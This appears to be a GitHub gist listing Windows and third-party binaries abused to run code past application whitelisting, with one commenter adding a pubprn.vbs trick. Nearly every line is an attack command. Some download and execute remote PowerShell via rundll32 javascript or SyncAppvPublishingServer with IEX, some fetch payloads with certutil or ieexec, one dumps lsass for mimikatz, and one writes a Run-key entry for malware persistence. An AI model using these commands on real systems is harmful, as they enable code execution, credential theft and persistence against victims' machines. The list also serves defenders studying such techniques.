Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
regsvr32 /s /n /u /i: scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
sqldumper.exe 540 0 0x01100
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
winword /l dllfile.dll
InfDefaultInstall.exe shady.inf
sqldumper 540 0 0x01100
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
Powershell host
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
print /D:c:\ads\file.exe \\\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
*** Non-MS binaries ***
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
symerr.exe ("cclib.dll" in same directory) -
SynTPEnh.exe /SHELLEXEC somebinary.exe -
GfxDownloadWrapper.exe "" "C:\Temp\harmless.exe" -
RunCmd_x64.exe C:\windows\system32\calc.exe
plexscripthost.exe #Pythonscript engine

This comment has been minimized.

Copy link

fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.